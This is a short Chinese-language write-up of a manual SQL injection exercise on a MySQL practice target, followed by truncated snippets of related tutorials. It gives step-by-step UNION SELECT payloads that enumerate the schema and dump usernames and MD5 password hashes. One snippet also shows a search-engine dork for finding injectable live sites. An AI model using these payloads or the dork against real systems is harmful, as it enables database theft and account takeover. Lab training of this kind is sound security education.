sql手工注入漏洞測試(mysql資料庫) 的靶場練習 流程與方法
注意:加粗部分給重點
查詢資料庫名
union select 1,database(),3,4 from information_schema.tables
獲取到的庫名
mozhe_discuz_stormgroup
查詢庫下的表名
union select 1,group_concat(table_name),3,4 frominformation_schema.tableswheretable_schema='mozhe_discuz_stormgroup'
獲取到的表名
stormgroup_member,notice
查詢表下的字段
union select 1,group_concat(column_name),3,4 frominformation_schema.columnswheretable_name='stormgroup_member'
獲取到的欄位名
id,name,password,status
查詢資料
union select 1,group_concat(id,0x5c,name,0x5c,password,0x5c,status),3,4 from stormgroup_member
得到的資料(ox5c為 \ 的16進製制)
1\mozhe\356f589a7df439f6f744ff19bb8092c0\0,1\mozhe\4adef249540a3cb5d79c85f6ccc7ddb9\1
md5解密得到密碼,經過測試有可用
4adef249540a3cb5d79c85f6ccc7ddb9
SQL手工注入
site xx.cn inurl asp?id 找文章 xx.cn pth onews.asp?id 243 試注入 xx.cn pth onews.asp?id 243 order by 10 xx.cn pth onews.asp?id 243 order by 20 order by 語句用於...
sql注入 手工注入
表示式 描述union 將查詢結果進行聯合輸出,追加在列尾 union all load 檔案讀取 into outfile 檔案寫入 datadir 資料庫檔案存放路徑 user 當前使用者 version 資料庫版本 database 資料庫名稱 表示系統變數 資料庫 表名描述 informat...
sql手工注入原理
純粹一些個人練習心得,所以今天就寫一篇部落格記錄一下 數值型 1.url輸入 and 1 1 and 1 2 回顯頁面不同 整形判斷 如果頁面執行錯誤,則說明此 sql 注入為數字型注入。因為當我們輸入 and 1 1時,後台執行 sql 語句 如 select from 表名 where id x...